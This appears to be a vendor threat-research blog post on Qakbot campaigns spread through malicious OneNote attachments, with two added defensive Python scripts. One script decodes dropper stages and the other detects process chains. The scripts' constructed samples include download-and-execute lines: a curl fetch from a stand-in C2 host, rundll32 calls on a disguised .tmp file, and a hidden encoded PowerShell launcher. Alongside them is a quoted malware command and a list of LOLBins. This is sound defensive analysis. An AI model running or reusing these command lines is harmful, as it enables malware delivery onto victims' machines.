# The Adventures of Malicious OneNote Attachments in Cortex XDR Land

By [Daniel Frank](https://www.paloaltonetworks.com/blog/author/daniel-frank/?ts=markdown "Posts by Daniel Frank"), Jul 05, 2023 (10 minutes)

## Executive Summary

The Cortex Threat Research team has been tracking recent campaigns that used malicious OneNote email attachments as the initial attack vector. Malicious OneNote files were popularized by various threat actors earlier this year, as a response to [Microsoft blocking internet macros](https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked) by default.

In correlation with Microsoft's notice, starting in early 2023, infected OneNote attachments have been seen spreading malware such as [Emotet](https://www.bleepingcomputer.com/news/security/emotet-malware-now-distributed-in-microsoft-onenote-files-to-evade-defenses/), [Qakbot](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rising-trend-of-onenote-documents-for-malware-delivery/), and [AsyncRAT](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-2/), to name a few.

Similar to attacks delivering malicious Word macro attachments, various themed emails were sent at scale, luring potential victims into downloading an attached malicious OneNote file. OneNote itself is installed by default as part of various versions of Microsoft Office installations, and allows embedding of macros.

Microsoft released [another notice](https://learn.microsoft.com/en-us/deployoffice/security/onenote-extension-block) in April, stating that 120 extensions will be blocked by default in OneNote, disabling the user's interaction with a OneNote file completely. These changes began rolling out with OneNote Version 2304 in April 2023, but for all users who have not yet updated, this attack vector is still prevalent.

We observed multiple malware delivery techniques in the different campaigns, using various script types that serve as loaders, such as [CScript](https://lolbas-project.github.io/lolbas/Binaries/Cscript/) and [WScript](https://lolbas-project.github.io/lolbas/Binaries/Wscript/), as well as running [MSHTA](https://lolbas-project.github.io/lolbas/Binaries/Mshta/) files.

This writeup examines some of the more salient techniques and provides insights on how Cortex XDR detects and blocks the infection chains derived from each file.

## Initial Access and Structure

The initial access vector of malicious OneNote attachments is the "good old" method of luring the victim into opening an email containing a malicious attachment. In the example below, we can see a targeted fake reply to a correspondence that pretends to concern an urgent matter, in order to pressure the victim into opening the attached file. This email was part of a larger phishing campaign that targeted Italian-speaking users.

![Figure 1. An email containing a malicious OneNote attachment](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-1.png)

Figure 1. An email containing a malicious OneNote attachment

These malicious documents often feature intentionally blurred content, accompanied by a message that prompts the user to press a button with the promise of unblurring the content. Pressing the button enables the malicious macro to run and ultimately triggers the infection chain.

The screenshot below depicts a malicious document that pretends to be protected by a "security signature" of Microsoft Azure Cloud.

![Figure 2. The content of the aforementioned OneNote malicious attachment](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-2.png)

Figure 2. The content of the aforementioned OneNote malicious attachment

Extracting the MSI package's content shows that these are all in fact just images, including the blurred "document" in the background. It is also interesting to note that the default names of the extracted image resources are in Russian and simply mean "unnamed painting".

![Figure 3. The image resources extracted from the OneNote file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-3.png)

Figure 3. The image resources extracted from the OneNote file

Another example shows a decoy email in German. This shows how widespread these attacks are, focusing on multiple potential victims and countries.

![Figure 4. Content of the lure email](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-4.png)

Figure 4. Content of the lure email

After opening the attached document, a window using the Office 365 theme appears, prompting the user to download a document allegedly hosted on the cloud.

![Figure 5. Another example of a malicious document content](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-5.png)

Figure 5. Another example of a malicious document content

The content of this document carries a malicious HTA file. After the user clicks on the "Open" button, they unknowingly execute the HTA file, and the JavaScript embedded in this file creates a fake popup message. The fake popup is used to divert the user's attention from the fact that a malicious script is running in the background.

![Figure 6. The fake message displayed while malicious code is running in the background](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-6.png)

Figure 6. The fake message displayed while malicious code is running in the background

### MSI Installer Variant

Once a user is successfully lured into clicking the aforementioned button, an MSI file is launched, with a malicious Windows script file bundled in it. Upon installation of the MSI file, the Windows script file is written to disk and then executed by the WScript engine.

Using the [UniExtract2](https://github.com/Bioruebe/UniExtract2) tool, it is possible to reveal the Windows script file that is bundled in the installation package.

![Figure 7. Contents of the MSI installer](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-7.png)

Figure 7. Contents of the MSI installer

The extracted script file is obfuscated and contains junk code. Parts of the script are also scattered in between benign text, such as excerpts from "Alice in Wonderland".

![Figure 8. Contents of the Windows script including a benign text from Alice in Wonderland](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-8.png)

Figure 8. Contents of the Windows script including a benign text from Alice in Wonderland

By breaking the script into pieces and embedding them in large benign text files, the attackers attempt to thwart analysis efforts and evade detection by AV solutions. Two scripts are eventually dropped on disk, in the `%programdata%` folder, by the Windows script.

![Figure 9. Names of the two script files that are being dropped on disk](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-9.png)

Figure 9. Names of the two script files that are being dropped on disk

The scripts are executed in the background while the victim thinks they are installing Azure cloud software.

![Figure 10. Content of the two script files dropped on disk](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-10.png)

Figure 10. Content of the two script files dropped on disk

The content of these two additional scripts, prior to being written to disk, is embedded in hex-encoded form in the Windows script file. There are two strings which are especially noticeable. Decoding the first hex-encoded string reveals the code below. This code downloads a file from a remote command and control (C2) server and saves it to disk.

![Figure 11. Content of the first decoded hex string](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-11.png)

Figure 11. Content of the first decoded hex string

Decoding the second hex string reveals another piece of code, responsible for executing the previously downloaded file with the correct export function, "Motd", using the Windows built-in Rundll32 binary. This indicates that the dropped file is actually a DLL file, rather than a .tmp file as the name would suggest.

![Figure 12. Content of the second decoded hex string](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-12.png)

Figure 12. Content of the second decoded hex string

The final payload is the well-established [Qakbot](https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot) malware, an information stealer, and formerly a banking Trojan, that has been around since at least 2007.

The execution of the MSI installer was detected and prevented by Cortex XDR, as seen in the screenshots below.

![Figure 13. The MSI installer process tree as seen in Cortex XDR in detect mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-13.png)

Figure 13. The MSI installer process tree as seen in Cortex XDR in detect mode

![Figure 14. The MSI installer process tree as seen in Cortex XDR in prevent mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-14.png)

Figure 14. The MSI installer process tree as seen in Cortex XDR in prevent mode

### HTA File Variant

We observed another infection method using OneNote in a campaign that targeted German-speaking users. In this campaign, instead of an MSI installer, the attackers used an [HTML Application](https://en.wikipedia.org/wiki/HTML_Application) (HTA) file.

The HTA file's content is much shorter than the previous MSI variant's Windows script, but it still contains some obfuscated strings. The string in its obfuscated form is depicted below.

![Figure 15. Obfuscated content of the HTA file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-15.png)

Figure 15. Obfuscated content of the HTA file

Deobfuscating this string returns the following script, which reveals the main malicious functionality.

![Figure 16. Deobfuscated content of the HTA file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-16.png)

Figure 16. Deobfuscated content of the HTA file

This part of the script shows the usage of the curl utility to download a payload to disk, masquerading it as a PNG file. The script then proceeds to display the fake popup message that the document is corrupted, as depicted in the "Initial Access" section.

After the deobfuscation, the script content is written to the registry, under the key `HKCU\\SOFTWARE\\rq5w\\xczis\\x4dyhu`. Finally, the freshly written key is read from the registry, and if it exists, the part of the script below provides the url parameter to the curl utility to download the malicious payload. The registry value is then deleted.

![Figure 17. The C2 URL as seen in the HTA file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-17.png)

Figure 17. The C2 URL as seen in the HTA file

Cortex XDR detected and prevented the execution of the mshta.exe file, as seen in the screenshots below.

![Figure 18. The HTA file execution as seen in Cortex XDR in detect mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-18.png)

Figure 18. The HTA file execution as seen in Cortex XDR in detect mode

![Figure 19. The HTA file execution as seen in Cortex XDR in prevent mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-19.png)

Figure 19. The HTA file execution as seen in Cortex XDR in prevent mode

### ISO + CHM Variant

We observed a third infection scenario that is an interesting combination of a bundled ISO image containing a [CHM file](https://en.wikipedia.org/wiki/Microsoft_Compiled_HTML_Help). The theme of the document resembles the examples above. When the user clicks on the "Open" button, the ISO image that contains the CHM file is mounted.

![Figure 20. The ISO image that is mounted on the user’s PC](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-20.png)

Figure 20. The ISO image that is mounted on the user's PC

After extracting the ISO file and the contents of the CHM file, we see that the CHM file contains an additional command line that is executed on click.

![Figure 21. Content of the CHM file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-21.png)

Figure 21. Content of the CHM file

The Base64-encoded command line translates to the code that can be seen in Figure 16. The encoded PowerShell command is in Base64 and decodes to `start rundll32 $env:TEMP\PebbliestUndetractive.capriote, Motd;`. This time the attackers embedded an array of C2 servers, running in a loop, waiting for a successful connection in order to download and execute the Qakbot payload.

![Figure 22. Base64 decoded PowerShell command](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-22.png)

Figure 22. Base64 decoded PowerShell command

Cortex XDR detected and prevented the execution of the CHM file, as seen in the screenshots below.

![Figure 23. The CHM file execution tree as seen in Cortex XDR in detect mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-23.png)

Figure 23. The CHM file execution tree as seen in Cortex XDR in detect mode

![Figure 24. The CHM file execution tree as seen in Cortex XDR in prevent mode](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-24.png)

Figure 24. The CHM file execution tree as seen in Cortex XDR in prevent mode

### Protections and Mitigations

Cortex XDR customers are protected against different variations of infection chains using malicious OneNote attachments. The scenarios described in detail above and their infection chains are detected and blocked by the Cortex XDR platform, as shown in each scenario's detection and prevention screenshots.

In addition to the classic detection, the unique [SmartScore](https://www.paloaltonetworks.com/blog/security-operations/beating-alert-fatigue-with-cortex-xdr-smartscore-technology/) engine translates security investigation methods and their associated data into an ML-driven hybrid risk scoring system. All three scenarios detailed in this blog scored higher than 95 out of 100 by SmartScore.

![Figure 25. SmartScore results for the MSI installer variant incident](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-297516-25.png)

Figure 25.
SmartScore results for the MSI installer variant incident
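
The hex-encoded strings in the Windows script (MSI Installer Variant) and the Base64 PowerShell command in the CHM file (ISO + CHM Variant) can both be recovered statically, without running the sample. The Python triage script below is an added example, not code from the original post or from Cortex XDR. The sample inputs, file paths and the `c2.example.invalid` host are constructed; only the decoded `rundll32` command is the one quoted in the ISO + CHM section.

```python
"""Static triage of a script dropper: carve hex and Base64 stages, list URLs."""
import base64
import binascii
import re

# 20+ bytes of hex; shorter runs are usually colour codes or identifiers.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){20,}(?![0-9A-Fa-f])")
# A PowerShell switch starting with "e", followed by a Base64 blob.
PS_SWITCH = re.compile(r"(?<!\w)-(e\w*)\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
URL = re.compile(r"https?://[^\s\"'<>)]+", re.I)


def mostly_text(s, threshold=0.9):
    """Reject decodes that are binary noise (for example a hash, which is also hex)."""
    ok = sum(32 <= ord(c) < 127 or c in "\r\n\t" for c in s)
    return bool(s) and ok / len(s) >= threshold


def decode_hex_runs(text):
    """Return every long hex run that decodes to readable text."""
    decoded = (bytes.fromhex(m.group(0)).decode("latin-1")
               for m in HEX_RUN.finditer(text))
    return [d for d in decoded if mostly_text(d)]


def decode_encoded_commands(text):
    """Decode -EncodedCommand arguments: Base64 over UTF-16LE text."""
    out = []
    for m in PS_SWITCH.finditer(text):
        switch, blob = m.group(1).lower(), m.group(2)
        # PowerShell accepts any prefix of "encodedcommand", plus the alias "ec".
        if switch != "ec" and not "encodedcommand".startswith(switch):
            continue
        try:
            cmd = base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if mostly_text(cmd):
            out.append(cmd)
    return out


def defang(url):
    """hxxp://host[.]tld/path form, safe to paste into tickets and reports."""
    scheme, rest = url.split("://", 1)
    host, slash, path = rest.partition("/")
    scheme = scheme.lower().replace("http", "hxxp")
    return f"{scheme}://{host.replace('.', '[.]')}{slash}{path}"


def triage(text, depth=2):
    """Peel up to `depth` encoding layers; return decoded stages and defanged URLs."""
    stages, frontier = [], [text]
    for _ in range(depth):
        frontier = [s for layer in frontier
                    for s in decode_hex_runs(layer) + decode_encoded_commands(layer)]
        stages += frontier
    urls = sorted({defang(u) for s in [text] + stages for u in URL.findall(s)})
    return {"stages": stages, "urls": urls}


# --- Constructed samples (not taken from the campaign) ----------------------
STAGE_A = (r"curl.exe --output C:\ProgramData\sample.tmp "
           "--url http://c2.example.invalid/a.dat")
STAGE_B = r"rundll32 C:\ProgramData\sample.tmp,Motd"
SAMPLE_WSF = "\n".join([
    "Alice was beginning to get very tired of sitting by her sister on the bank",
    f'k1 = "{STAGE_A.encode().hex()}"',
    "and of having nothing to do: once or twice she had peeped into the book",
    f'k2 = "{STAGE_B.encode().hex()}"',
    # Hash-like noise: valid hex, but it does not decode to text and is dropped.
    "0a1b2c3d4e5f60718293a4b5c6d7e8f9ffeeddccbbaa99887766554433221100",
])
# The decoded command quoted in the ISO + CHM section, re-encoded for the demo.
PS_CMD = r"start rundll32 $env:TEMP\PebbliestUndetractive.capriote, Motd;"
SAMPLE_CHM_CMD = ("powershell.exe -WindowStyle Hidden -enc "
                  + base64.b64encode(PS_CMD.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for name, sample in (("wsf", SAMPLE_WSF), ("chm", SAMPLE_CHM_CMD)):
        print(name, triage(sample))
```

The printable-text filter is what keeps file hashes and other hex identifiers out of the result, so the threshold is the knob to adjust when a stage mixes text with binary data.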
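
The three infection chains above share two traits that can be hunted in process-creation telemetry: an installer, script host or download utility running underneath the application the lure was opened in, and Rundll32 calling an export in a file that does not carry a DLL extension. The Python sketch below is an added example and is not Cortex XDR's detection logic. The event rows are constructed, and it assumes the CHM file opens in `hh.exe`, the standard Windows help viewer, which the post does not name.

```python
"""Flag the process chains of the three OneNote variants in process-creation events."""
import ntpath
import re

# Applications the lure is opened in (assumption: .chm files open in hh.exe).
HOSTS = {"onenote.exe", "hh.exe"}
# Installers, script hosts and utilities a note-taking app or help viewer rarely starts.
LOLBINS = {"msiexec.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "powershell.exe", "cmd.exe", "curl.exe", "rundll32.exe"}
DLL_EXTENSIONS = {".dll", ".cpl"}
RUNDLL_ARGS = re.compile(
    r"rundll32(?:\.exe)?\"?\s+\"?([^\",]+?)\"?\s*,\s*(\w+)", re.I)


def ancestry(pid, by_pid):
    """Process names from the oldest known ancestor down to `pid`."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # `seen` guards against pid loops
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid]["image"]).lower())
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect(events):
    """Return one alert per process that matches either rule, in event order."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        chain = ancestry(e["pid"], by_pid)
        name, reasons = chain[-1], []
        # Rule 1: a LOLBin anywhere below a lure host application.
        host = next((n for n in chain[:-1] if n in HOSTS), None)
        if host and name in LOLBINS:
            reasons.append(f"{name} descends from {host}")
        # Rule 2: rundll32 pointed at a file without a DLL extension.
        m = RUNDLL_ARGS.search(e["cmdline"]) if name == "rundll32.exe" else None
        if m:
            ext = ntpath.splitext(m.group(1).strip())[1].lower()
            if ext not in DLL_EXTENSIONS:
                reasons.append(
                    f"rundll32 export {m.group(2)} called in a {ext or 'extensionless'} file")
        if reasons:
            alerts.append({"pid": e["pid"], "chain": " > ".join(chain),
                           "reasons": reasons})
    return alerts


# --- Constructed events: (pid, ppid, image, command line) --------------------
SYS = "C:\\Windows\\System32\\"
ONENOTE = r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE"
ROWS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # MSI installer variant
    (200, 100, ONENOTE, r'ONENOTE.EXE "C:\Users\u\Downloads\doc.one"'),
    (210, 200, SYS + "msiexec.exe", r'msiexec.exe /i "C:\Users\u\AppData\Local\Temp\setup.msi"'),
    (220, 210, SYS + "wscript.exe", r'wscript.exe "C:\ProgramData\stage.wsf"'),
    (230, 220, SYS + "rundll32.exe", r"rundll32.exe C:\ProgramData\sample.tmp,Motd"),
    # HTA file variant
    (300, 100, ONENOTE, r'ONENOTE.EXE "C:\Users\u\Downloads\doc2.one"'),
    (310, 300, SYS + "mshta.exe", r'mshta.exe "C:\Users\u\AppData\Local\Temp\doc.hta"'),
    (320, 310, SYS + "curl.exe",
     r"curl.exe --output C:\ProgramData\sample.png --url http://c2.example.invalid/a"),
    # ISO + CHM variant (the CHM is opened from the mounted image, not by OneNote)
    (400, 100, r"C:\Windows\hh.exe", r"hh.exe E:\doc.chm"),
    (410, 400, SYS + "powershell.exe", "powershell.exe -enc <base64 placeholder>"),
    (420, 410, SYS + "rundll32.exe",
     r"rundll32 C:\Users\u\AppData\Local\Temp\PebbliestUndetractive.capriote, Motd"),
    # Benign activity that must not alert
    (500, 100, SYS + "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),
    (510, 200, r"C:\Program Files\Microsoft\Edge\msedge.exe",
     "msedge.exe https://example.invalid/"),
]
EVENTS = [dict(zip(("pid", "ppid", "image", "cmdline"), row)) for row in ROWS]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["pid"], alert["chain"], alert["reasons"])
```

Parent links in real telemetry can be broken, for example when work is handed to a service, which is why the Rundll32 extension check does not depend on ancestry.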